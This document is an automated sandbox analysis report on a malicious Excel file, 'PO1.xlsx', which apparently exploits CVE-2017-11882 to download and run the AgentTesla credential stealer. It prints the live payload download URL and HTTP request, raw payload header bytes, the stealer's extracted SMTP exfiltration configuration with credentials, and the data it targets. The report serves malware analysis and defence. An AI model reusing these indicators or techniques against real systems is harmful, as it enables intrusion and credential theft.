Analysis Report PO1.xlsx

Overview

General Information

Sample Name: PO1.xlsx
Analysis ID: 321136
MD5: 825745a31fc275a41849f257818a6e5e
SHA1: 3cbd4431678267fd6660eab67d7c47bc6397e4c6
SHA256: 3a843efb1f58cbc577e62bbf34451912ac5618c8b79c18ecfa0e0257f927f0cf
Tags: VelvetSweatshopxlsx

Most interesting Screenshot:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AgentTesla
Contains functionality to detect sleep reduction / modifications
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
May check the online IP address of the machine
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Credential Stealer

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://192.3.141.160/document/vbc.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: vbc.exe.2900.5.memstr Malware Configuration Extractor: Agenttesla {"Username: ": "zjk8LX", "URL: ": "https://0s3qnY8Xpb.org", "To: ": "sales1@tzdieep.net", "ByHost: ": "smtp.tzdieep.net:587", "Password: ": "N2Ynx", "From: ": "sales1@tzdieep.net"}
Multi AV Scanner detection for submitted file
Source: PO1.xlsx ReversingLabs: Detection: 31%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.2a0000.2.unpack Avira: Label: TR/Spy.Gen8
Source: 5.1.vbc.exe.400000.0.unpack Avira: Label: TR/Spy.Gen8

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Users\Public\vbc.exe Code function: 4_2_00408938 FindFirstFileA,GetLastError, 4_2_00408938
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_00405AC0

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: api.ipify.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 174.129.214.20:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.141.160:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49170 -> 208.91.199.223:587
Source: Traffic Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.22:49171 -> 208.91.199.223:587
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 208.91.199.223:587
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 11:02:17 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Fri, 20 Nov 2020 08:58:14 GMTETag: "e6e00-5b4860b7af7f8"Accept-Ranges: bytesContent-Length: 945664Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 fa 06 00 00 70 07 00 00 00 00 00 f8 07 07 00 00 10 00 00 00 10 07 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 0e 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 7a 24 00 00 00 d0 09 00 f4 f5 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 09 00 c8 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 09 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 40 f8 06 00 00 10 00 00 00 fa 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 68 d8 01 00 00 10 07 00 00 da 01 00 00 fe 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 c1 0c 00 00 00 f0 08 00 00 00 00 00 00 d8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 7a 24 00 00 00 00 09 00 00 26 00 00 00 d8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 09 00 00 00 00 00 00 fe 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 40 09 00 00 02 00 00 00 fe 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c8 77 00 00 00 50 09 00 00 78 00 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 f4 f5 04 00 00 d0 09 00 00 f6 04 00 00 78 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0a 00 00 00 00 00 00 d2 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 208.91.199.223 208.91.199.223
Source: Joe Sandbox View IP Address: 174.129.214.20 174.129.214.20
Source: Joe Sandbox View IP Address: 174.129.214.20 174.129.214.20
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 208.91.199.223:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /document/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.160Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: unknown TCP traffic detected without corresponding DNS query: 192.3.141.160
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B1B89C3B.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /document/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.141.160Connection: Keep-Alive
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: api.ipify.org
Source: vbc.exe, 00000005.00000002.2348110727.0000000002331000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.2348110727.0000000002331000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2348110727.0000000002331000.00000004.00000001.sdmp String found in binary or memory: http://QBfyHm.com
Source: vbc.exe, 00000005.00000002.2348194051.00000000023DF000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org
Source: vbc.exe, 00000005.00000002.2348194051.00000000023DF000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: vbc.exe, 00000005.00000002.2348194051.00000000023DF000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USE
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000005.00000002.2347664312.00000000006A3000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000005.00000003.2325407797.0000000005C00000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2347602153.0000000000617000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000005.00000002.2347664312.00000000006A3000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enj
Source: vbc.exe, 00000005.00000002.2348194051.00000000023DF000.00000004.00000001.sdmp String found in binary or memory: http://elb097307-934924932.us-east-1.elb.amazonaws.com
Source: vbc.exe, 00000005.00000002.2348194051.00000000023DF000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000004.00000002.2134202807.0000000001E70000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2349292514.0000000005770000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000005.00000002.2348179868.00000000023CC000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2350904282.0000000006310000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: vbc.exe, 00000005.00000002.2348301705.0000000002498000.00000004.00000001.sdmp String found in binary or memory: http://smtp.tzdieep.net
Source: vbc.exe, 00000005.00000002.2348301705.0000000002498000.00000004.00000001.sdmp String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: vbc.exe, 00000004.00000002.2134202807.0000000001E70000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2349292514.0000000005770000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000005.00000002.2348309782.00000000024A5000.00000004.00000001.sdmp String found in binary or memory: https://0s3qnY8Xpb.=
Source: vbc.exe, 00000005.00000002.2348216002.0000000002401000.00000004.00000001.sdmp String found in binary or memory: https://0s3qnY8Xpb.org
Source: vbc.exe, 00000005.00000002.2348169899.00000000023BA000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org
Source: vbc.exe, 00000005.00000002.2348169899.00000000023BA000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2348179868.00000000023CC000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.org/
Source: vbc.exe, 00000005.00000002.2348110727.0000000002331000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.orgGETMozilla/5.0
Source: vbc.exe, 00000005.00000002.2348188645.00000000023DA000.00000004.00000001.sdmp String found in binary or memory: https://api.ipify.orgP
Source: vbc.exe, 00000004.00000002.2138307858.0000000002EAB000.00000040.00000001.sdmp, vbc.exe, 00000005.00000001.2133236843.000000000044B000.00000040.00020000.sdmp String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: vbc.exe, 00000005.00000002.2348110727.0000000002331000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
Source: vbc.exe, 00000005.00000002.2348194051.00000000023DF000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2350029450.0000000005B60000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2348110727.0000000002331000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040703E OpenClipboard, 4_2_0040703E
Contains functionality to read the clipboard data
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043258C GetClipboardData,GlobalFix,GlobalUnWire, 4_2_0043258C
Contains functionality to record screenshots
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042384C GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette, 4_2_0042384C
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\Public\vbc.exe Code function: 4_2_0045BDA0 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA, 4_2_0045BDA0
Creates a window with clipboard capturing capabilities
Source: C:\Users\Public\vbc.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: protected documents the yellow bar vc 26 27 28 29 30 31 32 , I 33 34 - " 35 36 . . _ , _
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_00457E74 NtdllDefWindowProc_A, 4_2_00457E74
Source: C:\Users\Public\vbc.exe Code function: 4_2_004585F0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_004585F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_004586A0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_004586A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042E8BC NtdllDefWindowProc_A, 4_2_0042E8BC
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044CA64 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A, 4_2_0044CA64
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043CE20 NtdllDefWindowProc_A,GetCapture, 4_2_0043CE20
Source: C:\Users\Public\vbc.exe Code function: 5_2_00444159 NtCreateSection, 5_2_00444159
Source: C:\Users\Public\vbc.exe Code function: 5_1_00444159 NtCreateSection, 5_1_00444159
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00452548 4_2_00452548
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044CA64 4_2_0044CA64
Source: C:\Users\Public\vbc.exe Code function: 5_2_00405808 5_2_00405808
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402296 5_2_00402296
Source: C:\Users\Public\vbc.exe Code function: 5_2_0043D976 5_2_0043D976
Source: C:\Users\Public\vbc.exe Code function: 5_2_0044313D 5_2_0044313D
Source: C:\Users\Public\vbc.exe Code function: 5_2_00596350 5_2_00596350
Source: C:\Users\Public\vbc.exe Code function: 5_2_00595338 5_2_00595338
Source: C:\Users\Public\vbc.exe Code function: 5_2_00595680 5_2_00595680
Source: C:\Users\Public\vbc.exe Code function: 5_2_0059DA00 5_2_0059DA00
Source: C:\Users\Public\vbc.exe Code function: 5_2_0059BD60 5_2_0059BD60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0059EF08 5_2_0059EF08
Source: C:\Users\Public\vbc.exe Code function: 5_2_0059208F 5_2_0059208F
Source: C:\Users\Public\vbc.exe Code function: 5_2_05706F60 5_2_05706F60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0570A3A0 5_2_0570A3A0
Source: C:\Users\Public\vbc.exe Code function: 5_2_05703A38 5_2_05703A38
Source: C:\Users\Public\vbc.exe Code function: 5_2_0570A978 5_2_0570A978
Source: C:\Users\Public\vbc.exe Code function: 5_2_05704D50 5_2_05704D50
Source: C:\Users\Public\vbc.exe Code function: 5_2_057017B0 5_2_057017B0
Source: C:\Users\Public\vbc.exe Code function: 5_2_057017A8 5_2_057017A8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0570A018 5_2_0570A018
Source: C:\Users\Public\vbc.exe Code function: 5_2_05744CF1 5_2_05744CF1
Source: C:\Users\Public\vbc.exe Code function: 5_2_05740048 5_2_05740048
Source: C:\Users\Public\vbc.exe Code function: 5_1_0043D976 5_1_0043D976
Source: C:\Users\Public\vbc.exe Code function: 5_1_0044313D 5_1_0044313D
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: PO1.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0043DF3C appears 36 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00403980 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0043D36B appears 32 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00404320 appears 79 times
Tries to load missing DLLs
Source: C:\Users\Public\vbc.exe Section loaded: mscorwks.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: mscorsec.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: mscorjit.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/12@4/3
Source: C:\Users\Public\vbc.exe Code function: 4_2_00420594 GetLastError,FormatMessageA, 4_2_00420594
Source: C:\Users\Public\vbc.exe Code function: 4_2_00408B02 GetDiskFreeSpaceA, 4_2_00408B02
Source: C:\Users\Public\vbc.exe Code function: 4_2_00416D64 FindResourceA,LoadResource,SizeofResource,LockResource, 4_2_00416D64
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PO1.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD49D.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
